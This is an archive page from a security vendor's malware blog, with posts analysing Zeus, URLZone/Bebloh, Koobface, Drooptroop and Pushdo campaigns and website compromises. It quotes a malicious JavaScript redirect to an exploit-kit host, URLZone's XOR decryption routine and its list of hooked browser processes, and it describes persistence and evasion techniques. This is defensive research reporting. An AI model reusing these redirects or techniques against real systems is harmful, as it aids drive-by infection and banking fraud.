Malware « M86 Security Labs Blog

Archive for the ‘Malware’ Category

Don’t Pay Your Taxes

By Gavin Neale • December 5th, 2010 • Malware

Or at least try to ensure that your money doesn’t end up in the hands of criminals using the Zeus crimeware kit, which could happen if you fall for this latest malicious email campaign targeting tax payers. The emails are being sent from one of the Pushdo/Cutwail botnets and the campaign is very similar to the EFTPS one we previously blogged about. The main difference is the use of legitimate hacked websites and a range of exploits targeting vulnerabilities in client side software such as Java and Adobe PDF readers.

The malicious email claims that your tax payment has been rejected and provides a link for you to check your information:

The link in the email, which appears to go to eftps.gov, actually goes to one of many web pages which have been uploaded to hacked web servers. The pages contain the obfuscated JavaScript shown below:

All of this script has the effect of adding just one new line of JavaScript to the current page: location.replace(“http://[removed]autocom.ru/trafflit.php”). This code tells the browser to browse to a new URL that is hosting the SEO exploit kit which contains the JavaScript below.

This JavaScript determines if Java (Oracle Java, not JavaScript) is enabled and then redirects the browser again to the page rotator.php on the same server. Rotator.php contains exploits for four Java vulnerabilities and prompts you to download and open the file asshole.pdf. This PDF file, when opened in Adobe Reader attempts to detect the version and then launch an appropriate exploit if the detected version is known to be vulnerable.

The end goal of all these redirects and exploits is to install the notorious Zeus crimeware bot onto the victim’s machine. This is the VirusTotal report for the Zeus sample we collected. Zeus is well known for helping criminals steal login credentials as victims’ browse their online bank accounts and to transfer money into accounts under the criminals’ control.

Click Fraud from Drooptroop

By Gavin Neale • August 30th, 2010 • Malware

Advertising networks pay affiliates, usually website operators, for each click on an advertisement that the affiliate has displayed on their website. Click fraud is where affiliates have no intention of waiting for people to visit their website, instead they fraudulently send imitation clicks to the ad network, often using automated scripts or botnets to quickly generate a profit. We recently took a look at Drooptroop, a Trojan horse designed to intercept browser requests for search results and send an intimation ad click to an advertising network, which in turn direct the browser to a website as if the user had actually clicked on that ad.

Drooptroop modifies windows network functions loaded by the browser so that they point to Drooptroop’s own routines where it can intercept and modify the browser’s internet traffic. The malware then waits for the user to do a search using one of several popular search engines including Google, Yahoo, Bing or Altavista. When the user clicks on one of the search results, Drooptroop sends a simulated click on an advert to an advertising network and redirects the browser to a web page chosen by that advertising network.

During the time we were observing it, Drooptroop served ads from the advertising networks 7Search.com and relestar.com as well as fake Anti-Virus websites designed to scare users into downloading and eventually buying fake AV products.

On a machine infected with Drooptroop, we did a Google search for ‘Click fraud’ and got the usual results page:

Tags: Click fraud | Cybercrime | Drooptroop

GootKit – Automated Website Infection

By Gavin Neale • June 30th, 2010 • Malware

Each day, when we review our spam feeds, we see links to hundreds of hacked or compromised websites that are used to serve as hosts for spam content, such as images, redirect scripts or malicious IFrames. Often these websites have had code appended to the end of each file or have had new HTML or PHP files uploaded to them. For example, here is a spam email sent by the Pushdo botnet. Three of the four links in this email lead to the same compromised website.

Below are two common examples of files that have been uploaded to compromised websites.

Tags: Automation | FTP | GootKit | Legitimate Sites

Pushdo uses World Cup Theme to Spread Malware

By Gavin Neale • June 15th, 2010 • Malware

Over the last couple of days we have been seeing numerous malicious and Canadian Pharmacy spam campaigns sent from the Pushdo botnet. This campaign features an HTML file as an attachment and some subject lines, including one that mentions the FIFA World Cup, that may fool unwary recipients. Some of the email subjects we have seen are:

FIFA World Cup South Africa… bad news

[Recipient Domain] account Information

[Random Email Address] has sent you a birthday ecard.

Reset your Twitter password

The HTML file attachment contains the following JavaScript:

We have seen several different variations of this script but all have the same purpose which is concealed by some very basic obfuscation. If we remove the parts of this script that aren’t doing anything and clean up some of the text we get the script below:

If this attachment was opened in a browser with JavaScript enabled then the script will redirect the browser to the file z.htm (shown below) on one of several different web servers.

This page waits for three seconds and then redirects the browser to a Canadian Pharmacy website. While waiting, a hidden IFrame is loaded. We have removed some of the obfuscation to make the script in this IFrame more readable:

This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF readers and if one is found, adds an IFrame to the page pointing to a malicious PDF file.

The script then checks if Java (Thats Sun Microsystem’s Java, not JavaScript) is enabled, and if so, adds an IFrame that exploits vulnerabilities in Java.

The exploits install an executable named game.exe which we have not yet analyzed and is not detected by many anti virus products.

Tags: Malicious Spam | Pushdo | Spambot | World Cup

iTunes Gift Certificate Malware

By Rodel Mendrez • May 13th, 2010 • Malware

The Pushdo (Cutwail) spambot is a notorious scam machine which has recently been using a variety of social engineering themes and targets to push fake anti-virus, Bredolab and Zbot executables. One of Pushdo's latest themes is the online iTunes store which attempts to lure users to open a rich text format (RTF) file attachment claiming to be a "$50 iTunes Gift Certificate".

It seems a bit odd for the iTunes store to use a RTF document format for sending out iTunes gift certificates, and this alone should make most users suspicious. When we extracted the RTF file, we discovered an embedded executable that was a fake anti-virus installer.

Figure 1. Sample iTunes scam spam campaign

Opening the RTF document does not automatically run the executable file. However it relies on social engineering to convince a potential victim to click the file by using the unsophisticated filename "CLICK HERE.exe".

It pays not to get too excited with free stuff like this because opening a "$50 iTunes Gift Certificate" attachment could force you to pay $50 for bogus anti-virus software, not to mention placing your credit card information at risk.

MailMarshal Customers are protected from these campaigns with SpamCensor 443.

Tags: Apple | iTunes | Malicious Spam

Malware Analysis – Trojan Banker URLZone/Bebloh

By Daniel Chechik • September 30th, 2009 • Malware

In our recent Cybercrime Intelligence report, we described a cybercriminal process of robbing money from bank accounts, using money mules and Trojans.

In this blog post, we will provide you with more technical aspects about the Trojan Banker URLZone/Bebloh that they used.

URLZone is a Trojan Kit that allows the attacker to use the “URLZone Builder” for creating a configuration file. This file contains precise orders to the bot, enabling the attacker to target any bank he wants (We described in the Cybercrime Intelligence report how the bot is activating account). The URLZone successfully managed to bypass the German banks’ protection using “One Time Password”. This is a technique used to enable the user to get a new password every time he logs into his account. Its goal is to make the theft of usernames and passwords worthless. In order to be successful, the malware must execute itself on the browser to change the parameters and fool the user to approve a fraudulent money transaction from his account.

Let’s now take a step-by-step look at how the Trojan operates.

Once the malware is executed, it copies itself to c:\uninstall02.exe. It then creates an ID and sends it with the version ID of the malware to the Command & Control (C&C) in order to confirm that the infected machine now contains the latest version of the malware.

The C&C logs the information and write it to REQ[x].txt
10:57:38 2009-09-24 GMT *****User ID**** ****IP****** 200908291825

Once the new executable is downloaded, it is copied to SYSTEM32 with a random name and hidden mask with the date of the operation system files.

Following is a screenshot of Virus Total scan results (2/41) for the latest generated malware:

It is important to mention URLZone (just like Zeus/Zbot and others) cannot operate on its own, since it is just a bot that is hooked into system processes and hides itself. The logic part of the malware is found in the configuration file – in our case INJECT file. The next step of the malware is downloading the configuration file.

Snippet code of the obfuscated configuration file:

The new generated configuration file is stored locally and is encrypted.

The malware itself doesn’t change any system files. In order to keep working after the victimized machine’s restart, it adds itself to the startup registry.

The malware sets itself with a “Debugger” value to the file “userinit.exe”. This ensures that every time the file “userinit.exe” runs, the malware will run instead.
The malware hooks itself to the “svchost.exe” process and checks the C&C server every 3 hours for new commands and updates. Behind the scenes, the malware checks every second whether a new instance of the following application was executed:

myie.exe
iexplore.exe
firefox.exe
mozilla.exe
avant.exe
maxthon.exe
thebat.exe
explorer.exe

Once the malware recognizes that one of the above is created, it hooks on it. The basic target of the malware (even without the configuration file) is to collect any credentials delivered by the user with HTTPS communication.

In case you wonder why the malware doesn’t collect the credentials from all the websites (even though it uses HTTPS) the answer is simple: the malware uses evasive techniques from security appliances. It limits itself to collect data that is sent by the user using POST method with less than 2,000 bytes, as shown below:

So far the malware behavior is similar to many other Trojans. However, URLZone uses the delivered configuration file to manipulate the user. Once the user opens his browser, the malware decrypts the configuration file:

The decrypting algorithm is pretty simple:
res=”"
for i in configuration_file:
res+=chr(255^ord(i));

Snippet code of the de-obfuscated configuration file:

The configuration file contains several sections – postbank.de (we are able to follow the malware steps using the screenshots it takes from the victim’s machine and transmit it to the C&C server):

The malware manages to hook at the exact moment when the victim confirms his transaction. Once the user approves the transaction the malware changes details and sends it to the server.

According to the configuration file we are capable to see the following:

In order not to raise any suspicion, the malware verifies that the user will only see what he expects.

As can be seen in the screenshot above, the malware manipulates the statistic page of the user account, maiking it look like the transaction was completed successfully. However, if we take a look at the server side reports, we see exactly how much money was actually delivered.

As can be seen from the server log above, the malware identifies that user is limited to a maximum transfer of 2000 Euro (INET_LIMIT=2000), so he transferred 1900 Euro (AMOUNT=1900.00) to the money mule account located under DROPNAME variable.

The following screen shot shows the latest version VirusTotal 5/41 detection rate of URLZone/Bebloh malware (29.9.09)
MD5: 27E8351A5B0BEA5EF15C6681007FDEE5

Posted By Daniel Chechik

Koobface malware distribution technique – automatic user account creation on FaceBook, Twitter, BlogSpot and others

By Daniel Chechik • August 11th, 2009 • Cybercrime Malware

Koobface is a well-discussed computer worm that tries to infect users using social engineering attacks. Koobface mainly abuses popular social-networking websites such as Facebook, Twitter, Bebo and Myspace.
In this post I’ll describe another, less discussed, distribution tactic of this malware – using SEO techniques. In this scenario, the malware automatically creates BlogSpot accounts and populate it with the latest news using Google news feed. It means that the trap-site contains up-to-date content with some of the most popular search terms.

The blog shown above is an example of such an account that was automatically created by Koobface. In addition to the news feed, the malware also adds a script that redirects the victim to a malicious website that tries to install the Trojan.
Following is a code snippet of the malicious script:

The user is redirected to a fake Facebook page:
http://mi[--REMOVED--]09.com/go/fb.php

In order to see the video, the user is asked to “Upgrade” his Flash Player. Needless to say, any click on this page will dupe the user to download the malware…

Once the malware is downloaded, it tries to create new accounts in various websites. To do that, it needs to overcome a security mechanism called CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) that is present on many websites and is designed to prevent computer programs from performing certain sensitive actions such as creating new accounts.
Following are the actions created by the malware

The Koobface tactic for bypassing the CAPTCHA test is simple – it challenges its infected users with this test by presenting the window showing below. The user is prompted to enter the word(s) in the image or his machine will shut down. The CAPTCHA image is sent to the victim by the C&C server.

The virus darkens the background and leaves the user no other option than to insert the code in the CAPTCHA within 3 minutes or else it will shut down his computer (we tested it: it doesn’t shut down the machine:)).
Does this CAPTCHA look familiar? Let me give you a hint….

Indeed, the above shown CAPTCHA picture is taken from Twitter’s account creation form. Several other popular websites, such as Bebo, Gmail, and Blogger are being abused in similar manner.

Here is another example. This time, the CAPTCHA is part of a Gmail account creation:

Koobface, installed on the victim machine, gets a CAPTCHA challenge by Gmail:
The virus sends the CAPTCHA to the C&C server:

The process might take several seconds, depending how fast the person on another infected machine is inserting the code of the CAPTCHA.
The malware keeps asking the C&C for the code, until it receives it:

Once the code is retrieved, the process continues and the new account is created:

As can be seen in the Fiddler dump above, the malware used the retrieved code from the C&C to successfully create the Gmail account. I can even log into the account using the credential above…

The malware continues working and it is going to create its own blog post using the email it created. It is now going to open a blog on Blogger.com:

Firstly, as can be seen in Fiddler dump, it accesses to:
http://news.google.com/?output=rss
The virus takes the latest news results from Google which will be used to create the blog post.
Following that, it accesses Blogger.com to create a new blog post.

Shown here is the blog post that the malware created just like the one we have seen at the beginning of this post.
The cybercriminals use a webservice to collect some statistics. Below you can see the number of unique users who reached these pages in the last couple of days:

As can be seen in the Referrer statistics above, the users are reaching the malware webpage from different websites, while each URL is using a different social engineering technique to trick the user.

There is no doubt that the technique works – more than 150,000 users reached the malware webpage in just 2 days!
Posted by Daniel Chechik

India’s Institute of Remote Sensing Government Website Compromised

By Anonymous • June 29th, 2009 • Cybercrime Malware

In May, we reported about a website of the Government of India that was compromised and used for serving malicious code.
Last week, we detected that another website from the Government of India “iirs-nrsa.gov.in” was compromised by cybercriminals who use it as a malicious code distribution channel. In this case, the criminals injected a script into the website that adds an IFrame to the page. This IFrame redirects the website visitors to malicious content.

Following is a code snippet of the malicious script injected to the website:

The IFrame created by this script points to malicious content hosted on server in Texas armed with the LuckySploit attack toolkit on which we wrote earlier this year. Below is a screenshot taken from the admin panel of the exploit toolkit showing the referrer statistics (Referrers are sites leading the victim to the exploit server), the “iirs-nrsa.gov.in” entry is highlighted:

As can be seen in the above screenshot, the attack toolkit managed to infect already 11,798 victims’ machines.
A code snippet of the obfuscated exploit served by this toolkit:

The exploit page was detected by only 4 out of 40 AV engines at Virus Total:

We notified CERT India about this issue; trusting that the problem will be fixed soon.
Posted by Golan Yosef

Tags: Compromised Website | Government Website | India's Institute | Injected Code | Luckysploit Exploit Kit

Malware and the rising sun website

By Moshe Basanchig • February 24th, 2009 • Cybercrime Malware Vulnerabilities

We at Finjan always claim that malware has no boundaries, and national borders won’t prevent cybercriminals from infecting websites with their malware. To demonstrate, let us take a closer look at the following site which is ranked 41 in Japan (!) and 382 worldwide, according to Alexa: yaplog.jp

As you can guess, this website was compromised and was found serving malware. Let’s look at this attack thoroughly.
First and foremost, an HTML IFRAME element was injected to one of the pages of yaplog.jp:

The embedded IFrame on this Japanese site points to an external webpage hosted in China, which we at MCRC are familiar with since July last year. But as old as it may be, it is still effective at infecting innocent visitors, especially those who run an outdated Operating System.
The first thing the malicious page does is creating an MDAC ActiveX object instance, which in turn creates a new XMLHTTP object instance. If this creation succeeds, it means that the browser being used is a vulnerable (un-patched) IE; hence an inclusion of another page is done. The new page uses the MDAC vulnerability in order to push a Trojan to the client, and execute it.
This is the MDAC check:

The included page is moderately obfuscated in order to increase its chances of avoiding signature-based scans, such as by Anti-Virus products.
Had the MDAC check failed, other vulnerabilities would have been exploited, each in a new IFRAME which includes an obfuscated page. First, IE’s VML renderer, which is used to have a buffer overflow, was simple to exploit in order to execute malicious code on the client machine. This is followed by the latest – and very much talked about – IE data-binding vulnerability, that also enables the execution of malicious code. This exploit was added only recently, and is known to be highly effective, as many browsers weren’t patched yet.
Next are attempts to use the previously vulnerable ANI (animated cursor) file type by instructing the browser to use a malicious ANI file for the mouse cursor.
Last, but not least, an attempt to exploit a Yahoo! Messenger vulnerability is done. This vulnerability is another buffer overflow which allows remote code execution.
Below is the code responsible for all of the exploits described above:

All of those exploits are used for the same purpose: push a downloader Trojan to the client. Once that Trojan is executed, it pulls a second Trojan, which is capable of stealing user data.
In order to make the attack more difficult to track, it uses a cookie as a client-side mechanism, ensuring that the malicious pages would be executed only once a day, and not more.
We are happy to report that yaplog.jp removed the malicious code from their website.
Posted by Moshe Basanchig

Tags: Injected IFrame | yaplog.jp

Short research of “in-the-cloud-service” and “unknown malware samples”

By Anonymous • July 3rd, 2008 • Malware

It looks like the new AV buzzword of “in-the-cloud-service” has gathered momentum among Anti- Virus vendors.
On June 30, 2008 an interview with Trend Micro’s CEO was published on Zdent.co.uk titled “Antivirus industry lied for 20 years “– it makes me wonder what is going to be changed in the 21st year? In the interview Trend Micro’s CEO unveiled the new vision of her company – moving to “In the Could Service” e.g. “throws all the unknown samples up into the cloud for deeper and faster pattern recognition”. What will happen if I’m offline…?.
Although I was very impressed -with this new vision, it did sound a little vague to me so I tried to clarify for myself what the meaning of “unknown samples” is. As far as I know Anti-virus blocks what it has seen before and holds a signature for. What is the advantage of the cloud to detect malicious code that is unknown? I can understand that a cloud can indicate on volume but not sure about unknown malicious code.
I would like to share with you the results of my short research of “unknown samples” and “in-the–cloud service”.
During June 2008, a new round of mass SQL injection attacks started. The attack tool (which was aliased as “Asprox”) has been around for a couple of years but during the last year there has been a new rise in the number of attacks. An “in the wild” new round of this mass attack is not supposed to be considered “unknown” to security vendors but let’s try to keep our optimistic spirit and not diverge.
The attack is designed to search Google for .asp pages which contain various terms, and will then launch SQL injection attacks against the websites returned by the search. A script/Iframe will be injected into the compromised website:

The injected script consisted of the following code:

I sent the [b.js] script for a Virus Total scan and got 10/33 AV products detecting the file as a potential Malware. Which is obviously a typical False Positive case? Isn’t it?

When modifying the script to point to another location of the malicious file [newhost.com.newfil.cgi], Virus Total reports on 6/33 AV products which detected the file as a potential Malware – where did the other 4 disappear to?

During June 2008, we detected more than 70 different domains hosting [b.js] and the location of the malicious file was unique to each and every one of them.
Following are the top malicious hosts with successful exploitation during the period of May 31 – June 30:

Can it be that Anti-virus products are now holding more signatures for domains and URLs rather than trying to identify a malicious code they never inspected before? As my research found, just by changing the domain names, some AVs did not find this code as malicious…… surprisingly enough.
As the [b.js] file is pointing to a malicious file which was the one I would expect security vendors to mark as dangerous, I posted the actual malicious file to Virus Total scan. This time half of the vendors detected it as a potential Malware so it came out ok we kept our optimistic spirit after all…

This malicious file is being around for over a month now. Isn’t that enough time for security vendors to be familiar with a mass attack and signature this file? Will “in-the-cloud” service help to improve that? I’m not really sure. It needs a different security technology to come to the rescue.
Posted by Ayelet Heyman